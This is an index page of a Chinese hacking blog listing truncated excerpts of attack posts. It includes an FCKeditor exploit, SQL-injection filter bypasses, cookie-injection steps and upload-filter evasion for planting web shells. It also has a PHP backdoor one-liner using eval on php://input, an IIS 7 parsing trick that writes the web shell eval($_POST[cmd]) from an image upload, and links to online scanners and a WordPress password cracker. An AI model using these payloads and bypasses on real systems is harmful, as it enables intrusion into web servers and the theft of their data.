WebShell'S Blog

  FCKeditor-Exp 来源与www.x7z.org Botak_XH Q493499867 ---------------------------------------------------------------------------------- <?php error_reporting(0); set_time_limit(0); ini_set("defa...

- 阅读全文 -

1.and 用&& 代替   2. or 用||代替   3.union select from 变成 /*!union*/这种。   一个例子：   https://www.webshell.cc/ select 1 /*!union*/ select 2 from adad where 1&&1     ...

- 阅读全文 -

for /r d:\wwwroot\web\webshell.cc\ %i in (*.asp) do @echo %i >>c:\windows\temp\1.txt 是把d:\wwwroot\web\目录下所有asp文件列出来 ，然后保存在c:\windows\temp\下的1.txt   ==========================华丽的分割线=========...

- 阅读全文 -

Cookies注入步骤 1）寻找形如“*.asp?id=x”类的带参数的rul 2）去掉“id=x”查看页面显示是否正常。如果不正常，说明差数在数据传递中时直接起作用的 3）清空浏览器地址，输入“javascript：alert（document.cookie=“id=”+escape("x")）;” 按Enter返回一个对话框，内容是“id=x”，然后用原来的url刷新页面，如果显示正常， 说明...

- 阅读全文 -

有很多已经修补过的fckeditor 我们上传x.asp;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效   利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在www.webshell.cc/editor/FCKeditor/editor/filemanager/browser/default/brow...

- 阅读全文 -

php sql injector的时候，很多情况下都是显示一行一行的数据，要一次得到全部数据或者表格，那就的重复多次。   函数group_concat可以实现将表格放入一个单元格中（即仅有一行一列）   例如：   select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g   那么将得到：   ...

- 阅读全文 -

author：舞林 tx微博：http://t.qq.com/wulinlw 晚上看到这个 http://www.wooyun.org/bug.php?action=view&id=5416 shopcar.class.php 被植入一句话 @eval(file_get_contents('php://input')); 去官网下了一套回来，看了下代码， class MemberShops...

- 阅读全文 -

家试试看吧，呵呵，不过下面那个破解wordpress密码的还能用 在线端口扫描： http://scan.subhashdasyam.com/port-scanner.php 在线VNC扫描： http://scan.subhashdasyam.com/dumper-with-login.php 在线SSH扫描： http://scan.subhashdasyam.com/ssh-scanner....

- 阅读全文 -

得到www.webshell.cc（仅为举例，非真实）web服务为IIS7.0 www.webshell.cc/robots.txt后面加上/任意字符.php成功解析为php 注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马 <?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?> 如果文件...

- 阅读全文 -

听说freerdp 模块是freerdp 是LINUX下的,远程工具，下载地址是https://github.com/FreeRDP/FreeRDP/downloads 看来只能我现在去搭建Linux环境测试一下了。   #!/usr/bin/env python ##############################################################...

- 阅读全文 -